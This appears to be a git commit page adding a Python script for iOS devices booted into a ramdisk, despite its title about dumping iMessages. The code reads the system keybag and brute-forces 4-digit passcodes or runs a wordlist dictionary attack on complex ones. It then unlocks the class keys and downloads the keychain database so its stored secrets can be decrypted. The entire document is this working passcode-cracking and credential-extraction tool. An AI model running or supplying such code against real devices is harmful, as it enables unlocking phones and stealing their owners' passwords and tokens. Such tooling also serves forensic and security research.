initial code for dumping imessages in a reasonable format
This commit is contained in:
Jeffrey Paul
@@ -0,0 +1,88 @@
|
||||
import plistlib
|
||||
import os
|
||||
from keystore.keybag import Keybag
|
||||
from keychain.keychain4 import Keychain4
|
||||
from keychain.managedconfiguration import bruteforce_old_pass
|
||||
from util.ramdiskclient import RamdiskToolClient
|
||||
from util import write_file
|
||||
|
||||
def bf_system():
|
||||
curdir = os.path.dirname(os.path.abspath(__file__))
|
||||
client = RamdiskToolClient()
|
||||
di = client.getDeviceInfos()
|
||||
devicedir = di["udid"]
|
||||
if os.getcwd().find(devicedir) == -1:
|
||||
try:
|
||||
os.mkdir(devicedir)
|
||||
except:
|
||||
pass
|
||||
os.chdir(devicedir)
|
||||
key835 = di.get("key835").decode("hex")
|
||||
|
||||
systembag = client.getSystemKeyBag()
|
||||
kbkeys = systembag["KeyBagKeys"].data
|
||||
kb = Keybag.createWithDataSignBlob(kbkeys, key835)
|
||||
keybags = di.setdefault("keybags", {})
|
||||
kbuuid = kb.uuid.encode("hex")
|
||||
print "Keybag UUID :", kbuuid
|
||||
if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key("passcodeKey"):
|
||||
print "We've already seen this keybag"
|
||||
passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
|
||||
print kb.unlockWithPasscodeKey(passcodeKey)
|
||||
kb.printClassKeys()
|
||||
else:
|
||||
keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
|
||||
di["KeyBagKeys"] = systembag["KeyBagKeys"]
|
||||
di.save()
|
||||
print "Enter passcode or leave blank for bruteforce:"
|
||||
z = raw_input()
|
||||
res = client.getPasscodeKey(systembag["KeyBagKeys"].data, z)
|
||||
if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
|
||||
print "Passcode \"%s\" OK" % z
|
||||
di.update(res)
|
||||
keybags[kbuuid].update(res)
|
||||
di.save()
|
||||
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
|
||||
write_file("keychain-2.db", keychain_blob)
|
||||
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
|
||||
return
|
||||
if z != "":
|
||||
print "Wrong passcode, trying to bruteforce !"
|
||||
if kb.passcodeComplexity == 0:
|
||||
print "Trying all 4-digits passcodes..."
|
||||
bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
|
||||
if bf:
|
||||
di.update(bf)
|
||||
keybags[kbuuid].update(bf)
|
||||
print bf
|
||||
print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
|
||||
kb.printClassKeys()
|
||||
di["classKeys"] = kb.getClearClassKeysDict()
|
||||
di.save()
|
||||
else:
|
||||
print "Complex passcode used, trying dictionary attack ..."
|
||||
dictfile = os.path.join(curdir, 'wordlist.dict')
|
||||
try:
|
||||
wordlist = open(dictfile, 'r').readlines()
|
||||
except (OSError, IOError), e:
|
||||
exit(e)
|
||||
for line in wordlist:
|
||||
res = client.getPasscodeKey(systembag["KeyBagKeys"].data, line.rstrip('\n'))
|
||||
if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
|
||||
print "Passcode \"%s\" OK" % line.rstrip('\n')
|
||||
di.update(res)
|
||||
keybags[kbuuid].update(res)
|
||||
di.save()
|
||||
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
|
||||
write_file("keychain-2.db", keychain_blob)
|
||||
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
|
||||
return
|
||||
print "Passcode not found!"
|
||||
return
|
||||
|
||||
#keychain_blob = client.downloadFile("/private/var/Keychains/keychain-2.db")
|
||||
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
|
||||
write_file("keychain-2.db", keychain_blob)
|
||||
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
|
||||
|
||||
bf_system()
|
||||
Reference in New Issue
Block a user